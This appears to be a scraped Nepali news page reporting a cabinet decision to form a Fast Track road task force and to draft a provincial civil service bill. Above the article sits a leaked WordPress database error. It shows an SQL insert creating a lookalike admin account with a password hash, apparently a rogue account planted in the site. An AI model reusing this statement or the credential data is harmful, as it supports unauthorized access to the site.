WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUwIIMEOyzkUGvg.PwhRQ8BEiAfDHA/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:35:07', '', 'admlnlx', 'admlnlx')
सरकार आफैँले फाष्ट ट्र्याक बनाउने यसअघिको घोषणाको कार्यान्वयन अघि बढाउन बिहीबार बसेको मन्त्रिपरिषद् बैठकले कार्यदल गठन गरेको हो। भारतीय कम्पनीले यसअघि बनाएको विस्तृत परियोजना प्रतिवेदनलाई उपयोग गर्न सकिने/नसकिने, वित्तीय स्रोत व्यवस्थापन कसरी खोजी गर्ने भन्नेबारे एक महिनाभित्र सुझाव दिने म्यान्डेट कार्यदललाई दिएको सरकारका प्रवक्ता एवं सूचना तथा सञ्चारमन्त्री सुरेन्द्रकुमार कार्कीले जानकारी दिए।
बैठकले प्रदेशक निजामती सेवाको गठन, सञ्चालन र सेवाको सर्त विधेयक तयार गर्न पनि सैद्धान्तिक सहमति दिएको छ। ‘प्रदेशमा कर्मचारीतन्त्र कस्तो हुन्छ भन्ने मोडालिटी यो बिधेयकले तयार पार्नेछ’ कार्कीले भने।